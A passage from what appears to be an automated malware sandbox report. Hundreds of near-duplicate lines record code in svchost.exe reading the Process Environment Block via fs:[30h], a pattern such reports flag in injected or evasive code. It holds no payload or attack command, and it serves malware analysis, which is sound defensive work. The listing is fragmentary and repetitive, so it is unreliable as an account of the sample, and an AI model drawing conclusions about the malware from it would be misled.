            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E28397 mov eax, dword ptr fs:[00000030h]1_2_02E28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED437C mov eax, dword ptr fs:[00000030h]1_2_02ED437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov ecx, dword ptr fs:[00000030h]1_2_02EB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFA352 mov eax, dword ptr fs:[00000030h]1_2_02EFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED8350 mov ecx, dword ptr fs:[00000030h]1_2_02ED8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A30B mov eax, dword ptr fs:[00000030h]1_2_02E6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A30B mov eax, dword ptr fs:[00000030h]1_2_02E6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A30B mov eax, dword ptr fs:[00000030h]1_2_02E6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C310 mov ecx, dword ptr fs:[00000030h]1_2_02E2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E50310 mov ecx, dword ptr fs:[00000030h]1_2_02E50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_02E2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E380E9 mov eax, dword ptr fs:[00000030h]1_2_02E380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB60E0 mov eax, dword ptr fs:[00000030h]1_2_02EB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C0F0 mov eax, dword ptr fs:[00000030h]1_2_02E2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E720F0 mov ecx, dword ptr fs:[00000030h]1_2_02E720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB20DE mov eax, dword ptr fs:[00000030h]1_2_02EB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC80A8 mov eax, dword ptr fs:[00000030h]1_2_02EC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF60B8 mov eax, dword ptr fs:[00000030h]1_2_02EF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF60B8 mov ecx, dword ptr fs:[00000030h]1_2_02EF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3208A mov eax, dword ptr fs:[00000030h]1_2_02E3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5C073 mov eax, dword ptr fs:[00000030h]1_2_02E5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E32050 mov eax, dword ptr fs:[00000030h]1_2_02E32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6050 mov eax, dword ptr fs:[00000030h]1_2_02EB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A020 mov eax, dword ptr fs:[00000030h]1_2_02E2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C020 mov eax, dword ptr fs:[00000030h]1_2_02E2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC6030 mov eax, dword ptr fs:[00000030h]1_2_02EC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB4000 mov ecx, dword ptr fs:[00000030h]1_2_02EB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E016 mov eax, dword ptr fs:[00000030h]1_2_02E4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E016 mov eax, dword ptr fs:[00000030h]1_2_02E4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E016 mov eax, dword ptr fs:[00000030h]1_2_02E4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E016 mov eax, dword ptr fs:[00000030h]1_2_02E4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F061E5 mov eax, dword ptr fs:[00000030h]1_2_02F061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E601F8 mov eax, dword ptr fs:[00000030h]1_2_02E601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF61C3 mov eax, dword ptr fs:[00000030h]1_2_02EF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF61C3 mov eax, dword ptr fs:[00000030h]1_2_02EF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02EAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02EAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_02EAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02EAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02EAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E70185 mov eax, dword ptr fs:[00000030h]1_2_02E70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEC188 mov eax, dword ptr fs:[00000030h]1_2_02EEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEC188 mov eax, dword ptr fs:[00000030h]1_2_02EEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED4180 mov eax, dword ptr fs:[00000030h]1_2_02ED4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED4180 mov eax, dword ptr fs:[00000030h]1_2_02ED4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB019F mov eax, dword ptr fs:[00000030h]1_2_02EB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB019F mov eax, dword ptr fs:[00000030h]1_2_02EB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB019F mov eax, dword ptr fs:[00000030h]1_2_02EB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB019F mov eax, dword ptr fs:[00000030h]1_2_02EB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A197 mov eax, dword ptr fs:[00000030h]1_2_02E2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A197 mov eax, dword ptr fs:[00000030h]1_2_02E2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A197 mov eax, dword ptr fs:[00000030h]1_2_02E2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov eax, dword ptr fs:[00000030h]1_2_02EC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov eax, dword ptr fs:[00000030h]1_2_02EC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov ecx, dword ptr fs:[00000030h]1_2_02EC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov eax, dword ptr fs:[00000030h]1_2_02EC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov eax, dword ptr fs:[00000030h]1_2_02EC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C156 mov eax, dword ptr fs:[00000030h]1_2_02E2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC8158 mov eax, dword ptr fs:[00000030h]1_2_02EC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36154 mov eax, dword ptr fs:[00000030h]1_2_02E36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36154 mov eax, dword ptr fs:[00000030h]1_2_02E36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E60124 mov eax, dword ptr fs:[00000030h]1_2_02E60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov ecx, dword ptr fs:[00000030h]1_2_02EDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov ecx, dword ptr fs:[00000030h]1_2_02EDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov ecx, dword ptr fs:[00000030h]1_2_02EDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov ecx, dword ptr fs:[00000030h]1_2_02EDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA118 mov ecx, dword ptr fs:[00000030h]1_2_02EDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA118 mov eax, dword ptr fs:[00000030h]1_2_02EDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA118 mov eax, dword ptr fs:[00000030h]1_2_02EDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA118 mov eax, dword ptr fs:[00000030h]1_2_02EDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF0115 mov eax, dword ptr fs:[00000030h]1_2_02EF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02EAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02EAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02EAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02EAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB06F1 mov eax, dword ptr fs:[00000030h]1_2_02EB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB06F1 mov eax, dword ptr fs:[00000030h]1_2_02EB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_02E6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A6C7 mov eax, dword ptr fs:[00000030h]1_2_02E6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C6A6 mov eax, dword ptr fs:[00000030h]1_2_02E6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E666B0 mov eax, dword ptr fs:[00000030h]1_2_02E666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34690 mov eax, dword ptr fs:[00000030h]1_2_02E34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34690 mov eax, dword ptr fs:[00000030h]1_2_02E34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF866E mov eax, dword ptr fs:[00000030h]1_2_02EF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF866E mov eax, dword ptr fs:[00000030h]1_2_02EF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A660 mov eax, dword ptr fs:[00000030h]1_2_02E6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A660 mov eax, dword ptr fs:[00000030h]1_2_02E6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E62674 mov eax, dword ptr fs:[00000030h]1_2_02E62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4C640 mov eax, dword ptr fs:[00000030h]1_2_02E4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E627 mov eax, dword ptr fs:[00000030h]1_2_02E4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E66620 mov eax, dword ptr fs:[00000030h]1_2_02E66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E68620 mov eax, dword ptr fs:[00000030h]1_2_02E68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3262C mov eax, dword ptr fs:[00000030h]1_2_02E3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE609 mov eax, dword ptr fs:[00000030h]1_2_02EAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72619 mov eax, dword ptr fs:[00000030h]1_2_02E72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E527ED mov eax, dword ptr fs:[00000030h]1_2_02E527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E527ED mov eax, dword ptr fs:[00000030h]1_2_02E527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E527ED mov eax, dword ptr fs:[00000030h]1_2_02E527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBE7E1 mov eax, dword ptr fs:[00000030h]1_2_02EBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E347FB mov eax, dword ptr fs:[00000030h]1_2_02E347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E347FB mov eax, dword ptr fs:[00000030h]1_2_02E347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3C7C0 mov eax, dword ptr fs:[00000030h]1_2_02E3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB07C3 mov eax, dword ptr fs:[00000030h]1_2_02EB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E307AF mov eax, dword ptr fs:[00000030h]1_2_02E307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED678E mov eax, dword ptr fs:[00000030h]1_2_02ED678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E38770 mov eax, dword ptr fs:[00000030h]1_2_02E38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6674D mov esi, dword ptr fs:[00000030h]1_2_02E6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6674D mov eax, dword ptr fs:[00000030h]1_2_02E6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6674D mov eax, dword ptr fs:[00000030h]1_2_02E6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30750 mov eax, dword ptr fs:[00000030h]1_2_02E30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBE75D mov eax, dword ptr fs:[00000030h]1_2_02EBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72750 mov eax, dword ptr fs:[00000030h]1_2_02E72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72750 mov eax, dword ptr fs:[00000030h]1_2_02E72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB4755 mov eax, dword ptr fs:[00000030h]1_2_02EB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C720 mov eax, dword ptr fs:[00000030h]1_2_02E6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C720 mov eax, dword ptr fs:[00000030h]1_2_02E6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6273C mov eax, dword ptr fs:[00000030h]1_2_02E6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6273C mov ecx, dword ptr fs:[00000030h]1_2_02E6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6273C mov eax, dword ptr fs:[00000030h]1_2_02E6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAC730 mov eax, dword ptr fs:[00000030h]1_2_02EAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C700 mov eax, dword ptr fs:[00000030h]1_2_02E6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30710 mov eax, dword ptr fs:[00000030h]1_2_02E30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E60710 mov eax, dword ptr fs:[00000030h]1_2_02E60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E304E5 mov ecx, dword ptr fs:[00000030h]1_2_02E304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E364AB mov eax, dword ptr fs:[00000030h]1_2_02E364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E644B0 mov ecx, dword ptr fs:[00000030h]1_2_02E644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBA4B0 mov eax, dword ptr fs:[00000030h]1_2_02EBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBC460 mov ecx, dword ptr fs:[00000030h]1_2_02EBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5A470 mov eax, dword ptr fs:[00000030h]1_2_02E5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5A470 mov eax, dword ptr fs:[00000030h]1_2_02E5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5A470 mov eax, dword ptr fs:[00000030h]1_2_02E5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2645D mov eax, dword ptr fs:[00000030h]1_2_02E2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5245A mov eax, dword ptr fs:[00000030h]1_2_02E5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2E420 mov eax, dword ptr fs:[00000030h]1_2_02E2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2E420 mov eax, dword ptr fs:[00000030h]1_2_02E2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2E420 mov eax, dword ptr fs:[00000030h]1_2_02E2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C427 mov eax, dword ptr fs:[00000030h]1_2_02E2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E68402 mov eax, dword ptr fs:[00000030h]1_2_02E68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E68402 mov eax, dword ptr fs:[00000030h]1_2_02E68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E68402 mov eax, dword ptr fs:[00000030h]1_2_02E68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E325E0 mov eax, dword ptr fs:[00000030h]1_2_02E325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C5ED mov eax, dword ptr fs:[00000030h]1_2_02E6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C5ED mov eax, dword ptr fs:[00000030h]1_2_02E6C5ED
